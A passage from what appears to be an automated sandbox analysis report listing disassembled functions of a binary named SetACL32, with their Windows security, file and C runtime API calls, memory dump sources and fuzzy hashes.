                • EqualSid.ADVAPI32(?,?), ref: 00F827D1
                • IsValidSid.ADVAPI32(?,?), ref: 00F82859
                • IsValidSid.ADVAPI32(00000008), ref: 00F82868
                • EqualSid.ADVAPI32(?,00000008), ref: 00F82876
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(00000000,00000000,00000000,00F89605,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8783E
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8784B
                  • Part of subcall function 00F87820: GetLengthSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F87852
                  • Part of subcall function 00F87820: CopySid.ADVAPI32(00F897F0,00000000,000C46C7,00F897F0,00F89605,00000000,000000FF), ref: 00F87871
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$Equal$CopyLength
                • String ID:
                • API String ID: 1685539899-0
                • Opcode ID: e1e9504ed12b0afd9a12e20ef2bb393d82585145c11e966ff67078ec5b87e1e2
                • Instruction ID: 56cac18dd8d73353e7cc3ec41140f7d55b218ec721fab1fba8f072057fdca7c6
                • Opcode Fuzzy Hash: e1e9504ed12b0afd9a12e20ef2bb393d82585145c11e966ff67078ec5b87e1e2
                • Instruction Fuzzy Hash: A4515E71E012159BDF59EF69C884BEEBBB8BF05310F08416AE805AB251D774FA44EB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F5B1B3
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F5B1D5
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F5B1F5
                • __Getctype.LIBCPMT ref: 00F5B294
                • std::_Facet_Register.LIBCPMT ref: 00F5B2E1
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F5B2F9
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                • String ID:
                • API String ID: 1102183713-0
                • Opcode ID: c827d2d0079d601a9c8c124d63fa601e6c300b271d0d6d45725a3adeee7a270d
                • Instruction ID: e50fa3e235d4cf2d7fecfb934270f943666e7984d2700c95adeae6348a7b768b
                • Opcode Fuzzy Hash: c827d2d0079d601a9c8c124d63fa601e6c300b271d0d6d45725a3adeee7a270d
                • Instruction Fuzzy Hash: FF510171D00608CFDB11DF58CA82BAAB7B4FF14310F148269ED499B252EB34B945EB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F67430
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F67452
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F67472
                • __Getctype.LIBCPMT ref: 00F6750B
                • std::_Facet_Register.LIBCPMT ref: 00F6752A
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F67542
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                • String ID:
                • API String ID: 1102183713-0
                • Opcode ID: c15283609712ddd3137b565fb26977159eb284f6ae289138f4d0f52d9e2c1a83
                • Instruction ID: 3244c336105acd36de2cd05165a37b3b1c5830eafd6b809a8b04083b510d7bd4
                • Opcode Fuzzy Hash: c15283609712ddd3137b565fb26977159eb284f6ae289138f4d0f52d9e2c1a83
                • Instruction Fuzzy Hash: 4041B171D04308CFDB10EF18D986AAABBB4EF04724F144169E84697391EB35AD45EB92
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: @M)w
                • API String ID: 0-1211491014
                • Opcode ID: 6f31556cee699b08aa5aebfc2f2db4a137d13e0ac9acfe34cf697fca6224f0dc
                • Instruction ID: 5e64ce4fed536eb359fd3c5915d57f6d59266ec2c558c287514e9fcd6792757d
                • Opcode Fuzzy Hash: 6f31556cee699b08aa5aebfc2f2db4a137d13e0ac9acfe34cf697fca6224f0dc
                • Instruction Fuzzy Hash: 5DB18E71D042089FDB14EFA4CC84BEEBBB9FF44310F18455DE816AB291DBB4A905EB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,746D712B,?,00000000,772EF6D0), ref: 00F69123
                • FileTimeToSystemTime.KERNEL32(?,?,?,00000000,772EF6D0), ref: 00F69140
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,00000000,772EF6D0), ref: 00F69150
                • FileTimeToLocalFileTime.KERNEL32(?,?,?,00000000,772EF6D0), ref: 00F69164
                Strings
                • %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d, xrefs: 00F6926B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Time$File$System$Local$Specific
                • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d
                • API String ID: 3144155402-169632472
                • Opcode ID: 96d95e7b008c9582e45d40c8c454284810a2fcd7aa2d859fc1fc98e2a0a6f80f
                • Instruction ID: ae49d49ee3a4a2c7e09308384f232083de3c30a245a3949d057647a988c62787
                • Opcode Fuzzy Hash: 96d95e7b008c9582e45d40c8c454284810a2fcd7aa2d859fc1fc98e2a0a6f80f
                • Instruction Fuzzy Hash: 07B12B71A4021E8FCB28DF54C894BEDBBB5EB48300F1085E9D91EB7741EB745A889F50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00FA75BC
                • _free.LIBCMT ref: 00FA75E5
                • SetEndOfFile.KERNEL32(00000000,00FA7131,00000000,00FA6A25,?,?,?,?,?,?,?,00FA7131,00FA6A25,00000000), ref: 00FA7617
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00FA7131,00FA6A25,00000000,?,?,?,?,00000000), ref: 00FA7633
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFileLast
                • String ID: @M)w
                • API String ID: 1547350101-1211491014
                • Opcode ID: 8c22d81bd8270bf700f4e97c502ce70cecbcbf1ca56ac2493edf7fa6e88bd3fd
                • Instruction ID: 0216f8d05d627e48ec881adc32340c75a06d959f20ad4ea9754fbc4adddfa3a5
                • Opcode Fuzzy Hash: 8c22d81bd8270bf700f4e97c502ce70cecbcbf1ca56ac2493edf7fa6e88bd3fd
                • Instruction Fuzzy Hash: 3441C1F2D047019FDF11BBA88C46F9E77A9AF86370F280510F514E6291EA38DD45BB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                • _free.LIBCMT ref: 00F97282
                • _free.LIBCMT ref: 00F972B8
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID: @M)w
                • API String ID: 2283115069-1211491014
                • Opcode ID: 51bfdc1cc5fd6accd7db1df13e416206a556db25e2a3e10ecc1df74859ed38b9
                • Instruction ID: 513ca4491b9babc6e0dd13194585fc646550c56af461e70ec9a19f5fec165187
                • Opcode Fuzzy Hash: 51bfdc1cc5fd6accd7db1df13e416206a556db25e2a3e10ecc1df74859ed38b9
                • Instruction Fuzzy Hash: FA11E93273C3056EFF1137B55C8BE2A317AABC27757280225F514871E1EE6A8C05F952
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9737C
                • _free.LIBCMT ref: 00F973D9
                • _free.LIBCMT ref: 00F9740F
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9741A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID: @M)w
                • API String ID: 2283115069-1211491014
                • Opcode ID: e40f52a71f29a8596e885d03ee8f881e7d97ca1c75164aed5ac6022c5d1c9663
                • Instruction ID: 8ec060929e0e6753a97b8592d1acf44981f241b9cba0cc5e34aa7c62199cc974
                • Opcode Fuzzy Hash: e40f52a71f29a8596e885d03ee8f881e7d97ca1c75164aed5ac6022c5d1c9663
                • Instruction Fuzzy Hash: DB11E53262C305AEFF1177B99C8BE2A3569ABC2775B280225F514871E2DE698C05F152
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F965BF,?,?,00F96587,?,?,?), ref: 00F965DF
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F965F2
                • FreeLibrary.KERNEL32(00000000,?,?,00F965BF,?,?,00F96587,?,?,?), ref: 00F96615
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 02c1108749dc760ae11dcfe7754b204cad71bb79eadce0d40e5d8a717c0ffed8
                • Instruction ID: d311862cd5b87b76b5cca65c99cfbd9c3df414fbb7f3da6423576595cd5b84cc
                • Opcode Fuzzy Hash: 02c1108749dc760ae11dcfe7754b204cad71bb79eadce0d40e5d8a717c0ffed8
                • Instruction Fuzzy Hash: B9F08C70A01219FBEF119B52DD1ABDEBFB9EB41765F044060E800E21A0CB708E00FE95
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000), ref: 00FA58D7
                • GetLastError.KERNEL32(?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000,00000000,00000000,?,00FA188A,?), ref: 00FA58E3
                  • Part of subcall function 00FA58A9: CloseHandle.KERNEL32(FFFFFFFE,00FA58F3,?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000,00000000,00000000), ref: 00FA58B9
                • ___initconout.LIBCMT ref: 00FA58F3
                  • Part of subcall function 00FA586B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FA589A,00FA48E9,00000000,?,00FA1336,00000000,?,00000000,00000000), ref: 00FA587E
                • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00FA48FC,00000000,00000001,00000000,00000000,?,00FA1336,00000000,?,00000000,00000000), ref: 00FA5908
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID: @M)w
                • API String ID: 2744216297-1211491014
                • Opcode ID: b1a3ddedba83cc8d5b694eaf528520a81747c649511037de82e2a2c94468adc9
                • Instruction ID: 39d9f259cf2071d252e9be3f4bf80ba4b0edf30855867c82a9d458f4310b3b86
                • Opcode Fuzzy Hash: b1a3ddedba83cc8d5b694eaf528520a81747c649511037de82e2a2c94468adc9
                • Instruction Fuzzy Hash: CDF01CB6801528BBCF221F91DC09E8A3F66FF4A7B1B044421FA1996130CA328920FB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetSecurityInfo.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00F807DE
                • NetShareGetInfo.NETAPI32(-0000001C,?,00000001,00000000,00000000,?,?,746D712B,00FBFE30,00000003,00000000), ref: 00F809E6
                • NetApiBufferFree.NETAPI32(00000000), ref: 00F80A2E
                • SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,00000000,?,746D712B,00FBFE30,00000003,00000000), ref: 00F80A68
                • NetShareSetInfo.NETAPI32(-0000001C,?,00000001,?,00000000), ref: 00F80ABA
                • CloseHandle.KERNEL32(00000000), ref: 00F80AD7
                • RegCloseKey.ADVAPI32(00000000), ref: 00F80AE8
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Info$CloseSecurityShare$BufferFreeHandleNamed
                • String ID:
                • API String ID: 2758331865-0
                • Opcode ID: 2a8e90f42858b462659f7e8f1de3d840ab210e3faf8c9a884fef1cf50c4ab046
                • Instruction ID: 386de2b9632eb3740c1517839f38cbd25946d94c50ff29c13a8c478f5ddb5f6c
                • Opcode Fuzzy Hash: 2a8e90f42858b462659f7e8f1de3d840ab210e3faf8c9a884fef1cf50c4ab046
                • Instruction Fuzzy Hash: E4817D71E002199BEF64EF64CC55BEE77B4AF04354F844199E809A7241DB34AE88EFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __alloca_probe_16.LIBCMT ref: 00F9D88B
                • __alloca_probe_16.LIBCMT ref: 00F9D951
                • __freea.LIBCMT ref: 00F9D9BD
                  • Part of subcall function 00F98049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                • __freea.LIBCMT ref: 00F9D9C6
                • __freea.LIBCMT ref: 00F9D9E9
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: __freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 1423051803-0
                • Opcode ID: adac6cee211b2d7e6f2d236124590754e39699e14c41be7a2608e008f9bc70d1
                • Instruction ID: cbb730c9a1b66f66c48cbb97fee6c55b4a5a1d359d8a133ad7888dc5f6f30c42
                • Opcode Fuzzy Hash: adac6cee211b2d7e6f2d236124590754e39699e14c41be7a2608e008f9bc70d1
                • Instruction Fuzzy Hash: 64518172900216ABFF25AF648C42FBF36A9EF857A0F250129FD0497151E678DC11A7A1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Concurrency::cancel_current_task.LIBCPMT ref: 00F65D01
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D63
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F65D85
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65DA5
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65F8B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                • String ID:
                • API String ID: 3053331623-0
                • Opcode ID: fe6e0593628fc8c7e65b51ed2f1686885fa692f5392cc2f85e4ea814c8217552
                • Instruction ID: 93e3c00e5165a9bde967ccc7f998c21e5534fc5e56ede59fd3384150c736e0c1
                • Opcode Fuzzy Hash: fe6e0593628fc8c7e65b51ed2f1686885fa692f5392cc2f85e4ea814c8217552
                • Instruction Fuzzy Hash: 2951B272D046099FDB10DF68DD41AAEB7F8EF45720F14416AEC05BB281EB35A901EB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F6591D
                • std::_Lockit::_Lockit.LIBCPMT ref: 00F6593D
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F6595D
                • std::_Facet_Register.LIBCPMT ref: 00F659FB
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65A13
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                • String ID:
                • API String ID: 459529453-0
                • Opcode ID: 0665a64aae52a8b211747a84f9be91b900c8d4314eeef41900a64ac7282cacec
                • Instruction ID: b94c677689a4b5bc77e2f9ad267546e41f69be2c27ca66dbc7853eb9515f31e7
                • Opcode Fuzzy Hash: 0665a64aae52a8b211747a84f9be91b900c8d4314eeef41900a64ac7282cacec
                • Instruction Fuzzy Hash: 89410771904608DFDB20DF54D982FAAB7B4FF40B24F18415EE846AB342D775AD01EB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EnterCriticalSection.KERNEL32 ref: 00F697B8
                • LeaveCriticalSection.KERNEL32(00FCB6D4,?,?), ref: 00F69880
                  • Part of subcall function 00F62DD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?), ref: 00F62E67
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFileLeaveModuleName
                • String ID: +qmt$.log$Emergency.log
                • API String ID: 4287384897-2469913045
                • Opcode ID: 02ed90f960971e8323530a00fa2e958905d3a00fd49116d4481d52774a405570
                • Instruction ID: dbc9386691542e3efa0e2e8c1a51e513fefea83b2cd0b81b196312d482e42a1d
                • Opcode Fuzzy Hash: 02ed90f960971e8323530a00fa2e958905d3a00fd49116d4481d52774a405570
                • Instruction Fuzzy Hash: 4331E731A04209DFCB14DFA4CD46BEEB779EF49720F50412DE90267280CBB59944EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 00F9793F
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F97951
                • _free.LIBCMT ref: 00F97963
                • _free.LIBCMT ref: 00F97975
                • _free.LIBCMT ref: 00F97987
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: ee45b3c62fc7a4be5d1122d563fa024512f9aaa6575dd3f5a5ab43dd5075ea80
                • Instruction ID: 2138f8ef5a2a26a5e1ff078dde8d171b9fa9ebc906c358d13f7cab37559e1089
                • Opcode Fuzzy Hash: ee45b3c62fc7a4be5d1122d563fa024512f9aaa6575dd3f5a5ab43dd5075ea80
                • Instruction Fuzzy Hash: 1EF03C32818705ABAE20EF68E98FC5AB3D9EB057607582809F044D7661CB24FC80FA50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EnterCriticalSection.KERNEL32(00FCAA14,00000000,?,00F676D3,00FCB698,00FACF20), ref: 00F8B42B
                • LeaveCriticalSection.KERNEL32(00FCAA14,?,00F676D3,00FCB698,00FACF20), ref: 00F8B45E
                • RtlWakeAllConditionVariable.NTDLL ref: 00F8B4D5
                • SetEvent.KERNEL32(?,00FCB698,00FACF20), ref: 00F8B4DF
                • ResetEvent.KERNEL32(?,00FCB698,00FACF20), ref: 00F8B4EB
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmp
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                • String ID:
                • API String ID: 3916383385-0
                • Opcode ID: 4bcb4aa61c12ebe2f784b90401dd465ed098ed26fe331bcd2db2e03d47f49eaa
                • Instruction ID: f605a73a17e06a7676ef144a9ce47bc62f42fd697cd1837d3bc95bf19cbfc79d
                • Opcode Fuzzy Hash: 4bcb4aa61c12ebe2f784b90401dd465ed098ed26fe331bcd2db2e03d47f49eaa
                • Instruction Fuzzy Hash: 560169B1A0462CEFC715AF18FE0AE943BA4FB0A711701446AF90293721CBB46800FB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • std::locale::_Init.LIBCPMT ref: 00F81F6D
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmp
